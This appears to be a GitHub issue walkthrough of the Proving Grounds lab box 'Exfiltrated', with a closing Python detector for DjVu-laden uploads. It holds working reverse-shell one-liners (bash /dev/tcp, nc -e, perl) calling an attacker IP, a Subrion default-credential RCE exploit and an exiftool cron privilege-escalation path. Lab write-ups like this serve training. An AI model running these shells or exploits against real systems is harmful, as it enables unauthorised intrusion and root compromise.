WDavid404 / PG-Box

PG box walkthrough note

Exfiltrated (easy) #9

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
-- http-title: Did not follow redirect to http://exfiltrated.offsec/

sudo vi /etc/hosts --> add exfiltrated.offsec

See the source code of the web page --> Subrion 4.2

From the page (/panel), we can see the version is 4.2.1

Try admin/admin login to http://exfiltrated.offsec/panel --> succeed

searchsploit Subrion 4.2 --> 49876.py

Try python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin --> it works (Note: the URL must be '/panel/' --> '/panel' doesn't work)

Try reverse shell commands, referring to https://www.revshells.com/

bash -c 'bash -i >& /dev/tcp/192.168.45.192/4444 0>&1'
nc -e /bin/bash 192.168.45.192 4444
perl -e 'use Socket;$i="192.168.45.192";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

---> didn't work

Try 'perl no sh':
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
--> it works.

Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color

cat /etc/crontab --> [screenshot]

cat image-exif.sh -->

#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"

IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE                   # <--- important!!
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"

The key point is the "exiftool "$IMAGES/$filename" >> $LOGFILE" command. Search for 'exiftool exploit' on Google --> https://www.exploit-db.com/exploits/50911

sudo apt update
sudo apt install djvulibre-bin
python3 50911.py -s 192.168.45.192 4444 

--> image

Upload image.jpg to /var/www/html/subrion/uploads:
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpg

Get a reverse shell from the target host
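
A defender-side check for the image-exif.sh step above, as an added example that is not part of the original note or of any tool it uses: it flags files the cron job would process (names containing "jpg") that carry an embedded DjVu container, so they can be quarantined before exiftool parses them. Assumptions: the crafted image.jpg embeds DjVu data (which is why the note installs djvulibre-bin); the function names and the sample bytes are constructed for illustration.

```python
import struct
from pathlib import Path

DJVU_MAGIC = b"AT&TFORM"                      # "AT&T" prefix + IFF "FORM" tag
DJVU_FORMS = {b"DJVU", b"DJVM", b"DJVI", b"THUM"}
ANNOTATION_CHUNKS = (b"ANTa", b"ANTz")        # plain / BZZ-compressed annotations


def find_embedded_djvu(data):
    """Return one finding per DjVu FORM header located anywhere in data."""
    findings = []
    pos = data.find(DJVU_MAGIC)
    while pos != -1:
        if pos + 16 <= len(data):             # room for length + form type
            (length,) = struct.unpack(">I", data[pos + 8:pos + 12])
            form = data[pos + 12:pos + 16]
            if form in DJVU_FORMS:
                body = data[pos + 16:pos + 12 + length]   # slice clamps if truncated
                findings.append({
                    "offset": pos,
                    "form": form.decode("ascii"),
                    "annotation": any(tag in body for tag in ANNOTATION_CHUNKS),
                })
        pos = data.find(DJVU_MAGIC, pos + 1)
    return findings


def scan_uploads(directory):
    """Check the files the cron job would process (names containing 'jpg')."""
    flagged = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file() and "jpg" in path.name:
            hits = find_embedded_djvu(path.read_bytes())
            if hits:
                flagged[path.name] = hits
    return flagged


def constructed_samples():
    """Constructed bytes (not decodable images): JPEG-like header, without and with an inert DjVu stub."""
    head = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    chunks = b"INFO" + struct.pack(">I", 0) + b"ANTz" + struct.pack(">I", 0)
    djvu = DJVU_MAGIC + struct.pack(">I", 4 + len(chunks)) + b"DJVU" + chunks
    return head + b"\xff\xd9", head + djvu + b"\xff\xd9"


if __name__ == "__main__":
    clean, suspect = constructed_samples()
    print("clean:", find_embedded_djvu(clean))
    print("suspect:", find_embedded_djvu(suspect))
```

This is a byte-level heuristic: a hit is a reason to quarantine the upload, and it does not replace updating exiftool.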